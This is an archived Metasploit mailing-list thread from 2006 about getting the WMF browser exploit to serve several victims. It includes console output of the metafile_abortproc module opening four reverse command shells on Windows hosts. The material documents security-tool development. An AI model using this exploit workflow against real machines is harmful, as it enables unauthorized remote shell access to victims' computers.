Metasploit mailing list archives
wmf flaws...auto-restart the exploit?
From: hdm at metasploit.com (H D Moore)
Date: Wed, 4 Jan 2006 09:05:53 -0600
This is one of the limitations under Metasploit 2.x, version 3.x supports what we call "passive exploits" that allow multiple sessions to be generated and handled. This version of msf3 should be released either late this week or early next (along with a working version of the WMF exploit). -HD Example of MSF3 + WMF: msf exploit(windows/browser/metafile_abortproc) > exploit [*] Started reverse handler [*] Using URL: http://192.168.0.100:8080/wee [*] Server started. [*] Exploit running as background job. msf exploit(windows/browser/metafile_abortproc) > [*] Sending stage (143 bytes) [*] Command shell session 1 opened (192.168.0.100:4444 -> 192.168.0.219:1380) [*] Sending stage (143 bytes) [*] Command shell session 2 opened (192.168.0.100:4444 -> 192.168.0.231:3311) [*] Sending stage (143 bytes) [*] Command shell session 3 opened (192.168.0.100:4444 -> 192.168.0.231:3312) [*] Sending stage (143 bytes) [*] Command shell session 4 opened (192.168.0.100:4444 -> 192.168.0.219:1382) msf exploit(windows/browser/metafile_abortproc) > session -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Command shell 192.168.0.100:4444 -> 192.168.0.219:1380 2 Command shell 192.168.0.100:4444 -> 192.168.0.231:3311 3 Command shell 192.168.0.100:4444 -> 192.168.0.231:3312 4 Command shell 192.168.0.100:4444 -> 192.168.0.219:1382 msf exploit(windows/browser/metafile_abortproc) > session -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\DDI\Desktop>exit exit Abort session 1? [y/N] y [*] Command shell session 1 closed. msf exploit(windows/browser/metafile_abortproc) > session -i 4 [*] Starting interaction with 4... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\DDI\Desktop>exit exit Abort session 4? [y/N] y [*] Command shell session 4 closed. msf exploit(windows/browser/metafile_abortproc) > session -i 2 [*] Starting interaction with 2... Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>exit exit Abort session 2? [y/N] y [*] Command shell session 2 closed. msf exploit(windows/browser/metafile_abortproc) > session -i 3 [*] Starting interaction with 3... Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>exit exit y Abort session 3? [y/N] y [*] Command shell session 3 closed. msf exploit(windows/browser/metafile_abortproc) > session -l Active sessions =============== No active sessions. msf exploit(windows/browser/metafile_abortproc) > On Tuesday 03 January 2006 18:48, Gianluigi "Zane" Zanettini wrote:
The problem is, the exploit quits after sending the payload (I'm using win32_reverse_stg_upexec): is there any way to automatically restart the webserver after that and get the exploit ready for another machine?
Current thread:
- wmf flaws...auto-restart the exploit? Gianluigi "Zane" Zanettini (Jan 03)
- wmf flaws...auto-restart the exploit? H D Moore (Jan 04)
- wmf flaws...auto-restart the exploit? Nicob (Jan 04)
- wmf flaws...auto-restart the exploit? H D Moore (Jan 05)
- wmf flaws...auto-restart the exploit? Gianluigi "Zane" Zanettini (Jan 05)
- Metasploit Book? Simon Taplin (Jan 05)
- Metasploit Book? H D Moore (Jan 05)
- Message not available
- Metasploit Book? Burak Cifter (Jan 05)
- Message not available
- Message not available
- Metasploit Book? Burak Cifter (Jan 05)
- Metasploit Book? Jason Mayer (Jan 05)
- wmf flaws...auto-restart the exploit? Nicob (Jan 04)
- wmf flaws...auto-restart the exploit? H D Moore (Jan 04)